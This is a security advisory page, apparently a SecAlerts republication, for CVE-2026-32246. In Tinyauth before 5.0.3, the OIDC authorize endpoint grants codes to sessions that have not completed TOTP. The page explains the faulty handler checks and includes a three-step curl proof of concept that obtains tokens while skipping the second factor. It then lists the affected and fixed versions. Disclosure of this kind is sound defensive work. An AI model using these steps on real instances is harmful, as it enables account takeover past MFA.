CVE-2026-32246: Tinyauth vulnerable to TOTP/2FA bypass via OIDC authorize endpoint

Published Mar 12, 2026
·
Updated

Summary

The OIDC authorization endpoint allows users with a TOTP-pending session (password verified, TOTP not yet completed) to obtain authorization codes. An attacker who knows a user's password but not their TOTP secret can obtain valid OIDC tokens, completely bypassing the second factor.

Details

When a user with TOTP enabled logs in at POST /api/user/login, the server creates a session with TotpPending: true and returns a session cookie. The context middleware (internal/middleware/contextmiddleware.go:56-66) correctly sets TotpPending: true and does not set IsLoggedIn for these sessions.

However, the OIDC authorize handler (internal/controller/oidccontroller.go:105-116) only checks whether a user context exists via utils.GetContext(c). It does not check IsLoggedIn or TotpPending. Since the context middleware populates a context for TOTP-pending sessions (with the username filled in), GetContext succeeds, and the handler proceeds to issue an authorization code at line 156 using the username from the incomplete session.

For comparison, the proxy controller (internal/controller/proxycontroller.go:176-179) correctly blocks TOTP-incomplete sessions by checking IsBasicAuth && TotpEnabled and setting IsLoggedIn = false. The OIDC authorize handler has no equivalent guard.

StoreCode at internal/service/oidcservice.go:305 saves the code with the victim's sub claim. The attacker then exchanges this code at POST /api/oidc/token for a valid access token and ID token.

PoC

Prerequisites: a tinyauth instance with at least one OIDC client configured and a local user with TOTP enabled.

Step 1 — Log in with password only (do not complete TOTP):

curl -c cookies.txt -X POST http://localhost:3000/api/user/login \ -H "Content-Type: application/json" \ -d '{"username":"totpuser","password":"totp123"}'

Response: {"message":"TOTP required","status":200,"totpPending":true}

Step 2 — Request an OIDC authorization code using the TOTP-pending cookie:

curl -b cookies.txt -X POST http://localhost:3000/api/oidc/authorize \ -H "Content-Type: application/json" \ -d '{"clientid":"my-client-id","redirecturi":"http://localhost:8080/callback","responsetype":"code","scope":"openid","state":"test"}'

Response: {"redirecturi":"http://localhost:8080/callback?code=<AUTHCODE>&state=test","status":200}

Step 3 — Exchange the code for tokens:

curl -X POST http://localhost:3000/api/oidc/token \ -u "my-client-id:my-client-secret" \ -d "granttype=authorizationcode&code=<AUTHCODE>&redirecturi=http://localhost:8080/callback"

Response contains accesstoken, idtoken, and refreshtoken for the victim user. TOTP was never submitted.

Impact

Complete bypass of TOTP/MFA for any user account on any tinyauth instance that has OIDC clients configured. An attacker who has compromised a user's password (credential stuffing, phishing, database breach) can obtain SSO tokens for that user's identity without knowing the TOTP secret. This defeats the purpose of the second factor entirely. All downstream applications relying on tinyauth's OIDC provider for authentication are affected.

Other sources

Tinyauth is an authentication and authorization server. Prior to 5.0.3, the OIDC authorization endpoint allows users with a TOTP-pending session (password verified, TOTP not yet completed) to obtain authorization codes. An attacker who knows a user's password but not their TOTP secret can obtain valid OIDC tokens, completely bypassing the second factor. This vulnerability is fixed in 5.0.3.

MITRE

Affected Software

2 affected componentsFixes available
go/github.com/steveiliop56/tinyauth<1.0.1-20260311144920-9eb2d33064b7
1.0.1-20260311144920-9eb2d33064b7
Tinyauth Tinyauth<=5.0.2

Event History

Mar 12, 2026
Advisory Published
via GitHub·04:38 PM
Data Sourced
via GitHub·04:38 PM
DescriptionSeverityWeaknessAffected Software
CVE Published
via MITRE·06:59 PM
Data Sourced
via MITRE·06:59 PM
DescriptionSeverityWeakness
Data Sourced
via NVD·07:16 PM
DescriptionSeverityWeakness
Data Sourced
via NVD·07:16 PM
Affected Software

Frequently Asked Questions

1

What is the severity of CVE-2026-32246?

CVE-2026-32246 is considered a high severity vulnerability due to the ability for attackers to bypass the second factor of authentication.

2

How do I fix CVE-2026-32246?

To fix CVE-2026-32246, upgrade to the version 1.0.1-20260311144920-9eb2d33064b7 or later of the affected software.

3

What software is affected by CVE-2026-32246?

CVE-2026-32246 affects the Tinyauth software version prior to 1.0.1-20260311144920-9eb2d33064b7.

4

What are the implications of CVE-2026-32246?

The implications of CVE-2026-32246 include unauthorized access as attackers can obtain valid OIDC tokens if they know the user's password.

5

Is it necessary to update software to mitigate CVE-2026-32246?

Yes, it is necessary to update the software to mitigate the risks associated with CVE-2026-32246.

Contact

SecAlerts Pty Ltd.
132 Wickham Terrace
Fortitude Valley,
QLD 4006, Australia
info@secalerts.co
By using SecAlerts services, you agree to our services end-user license agreement. This website is safeguarded by reCAPTCHA and governed by the Google Privacy Policy and Terms of Service. All names, logos, and brands of products are owned by their respective owners, and any usage of these names, logos, and brands for identification purposes only does not imply endorsement. If you possess any content that requires removal, please get in touch with us.
© 2026 SecAlerts Pty Ltd.
ABN: 70 645 966 203, ACN: 645 966 203